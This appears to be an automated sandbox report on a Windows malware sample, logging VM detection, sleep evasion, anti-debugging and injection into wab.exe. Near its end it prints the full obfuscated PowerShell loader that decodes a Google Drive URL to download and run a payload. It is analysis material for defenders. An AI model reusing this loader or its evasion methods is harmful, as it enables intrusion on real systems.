            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Check if machine is in data center or colocation facility
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: A50000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 24520000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 243F0000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4288Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5587Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7919Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1865Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 5030Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 3983Jump to behavior
            Source: C:\Windows\System32\wscript.exe TID: 5884Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2848Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3620Thread sleep count: 7919 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4440Thread sleep count: 1865 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4616Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -26747778906878833s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -100000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2588Thread sleep count: 5030 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -99875s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2588Thread sleep count: 3983 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -99765s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -99653s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -99542s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -99437s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -99328s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -99218s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -99109s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -98999s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -98890s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -98781s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -98671s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -98562s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -98452s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -98343s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -98234s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -98124s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -98015s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -97864s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -97750s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -97637s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -97526s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -97416s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -97311s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -97202s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -97088s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -96962s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -96842s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -96732s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -96624s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -96512s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -96406s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -96296s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -96172s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -96062s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -95953s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -95834s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -95718s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -95604s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -95489s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -95374s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -95265s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -95142s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -95015s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -94902s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 100000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99875Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99765Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99653Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99542Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99437Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99328Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99218Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99109Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98999Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98890Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98781Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98671Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98562Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98452Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98343Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98234Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98124Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98015Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97864Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97750Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97637Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97526Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97416Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97311Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97202Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97088Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96962Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96842Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96732Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96624Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96512Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96406Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96296Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96172Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96062Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95953Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95834Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95718Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95604Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95489Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95374Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95265Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95142Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95015Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 94902Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: wscript.exe, 00000000.00000002.2079442238.000001EA79156000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: wscript.exe, 00000000.00000003.2068606801.000001EA791E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2070156115.000001EA791E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2076473394.000001EA791E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2069510117.000001EA791E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2079541397.000001EA791E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2069833388.000001EA791E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: wscript.exe, 00000000.00000003.2069751324.000001EA79433000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2076795867.000001EA79458000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2076362482.000001EA7943B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2076183249.000001EA79411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2079981179.000001EA7945A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2076291584.000001EA7941F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`'
            Source: wscript.exe, 00000000.00000003.2068606801.000001EA791E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2070156115.000001EA791E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2076473394.000001EA791E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2069510117.000001EA791E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2079541397.000001EA791E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2069833388.000001EA791E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW>
            Source: powershell.exe, 00000002.00000002.2924619147.00000243C0710000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllph3
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00A570B8 CheckRemoteDebuggerPresent,10_2_00A570B8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04DCDAAC LdrInitializeThunk,5_2_04DCDAAC
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeCode function: 12_2_00382A7E GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,12_2_00382A7E
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeCode function: 12_2_00383450 SetUnhandledExceptionFilter,12_2_00383450
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeCode function: 12_2_003832C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_003832C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Writes to foreign memory regions
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4060000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: A5FA34Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivaelJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Merogastrula.Bes && echo $"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' 